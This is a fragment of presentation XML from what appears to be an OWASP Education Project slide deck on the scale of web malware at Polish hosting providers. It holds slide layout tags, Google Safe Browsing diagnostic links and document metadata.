            <a:ext cx="822636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kala problem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720720" y="1440000"/>
            <a:ext cx="73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web.archive.org/web/20080525170526/http://top100.pl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82760" y="1979640"/>
            <a:ext cx="8280360" cy="42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49400"/>
            <a:ext cx="822636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kala problemu (home.pl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720720" y="1440000"/>
            <a:ext cx="7535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www.google.com/safebrowsing/diagnostic?site=AS:128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7240" y="2011320"/>
            <a:ext cx="9086760" cy="392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49400"/>
            <a:ext cx="822636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kala problemu (netart.pl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720720" y="1440000"/>
            <a:ext cx="7535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www.google.com/safebrowsing/diagnostic?site=AS:159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7000" y="2006640"/>
            <a:ext cx="9078840" cy="3946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17:51:41Z</dcterms:created>
  <dc:creator>Sebastien Deleersnyder</dc:creator>
  <dc:description>http://www.owasp.org</dc:description>
  <cp:keywords>Application Security</cp:keywords>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Sebastien Deleersnyder</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2007-03-01T13:50:56Z</dcterms:modified>
  <cp:revision>3</cp:revision>
  <dc:subject>Application Security</dc:subject>
  <dc:title>OWASP Education Project - Template</dc:title>
</cp:coreProperties>
</file>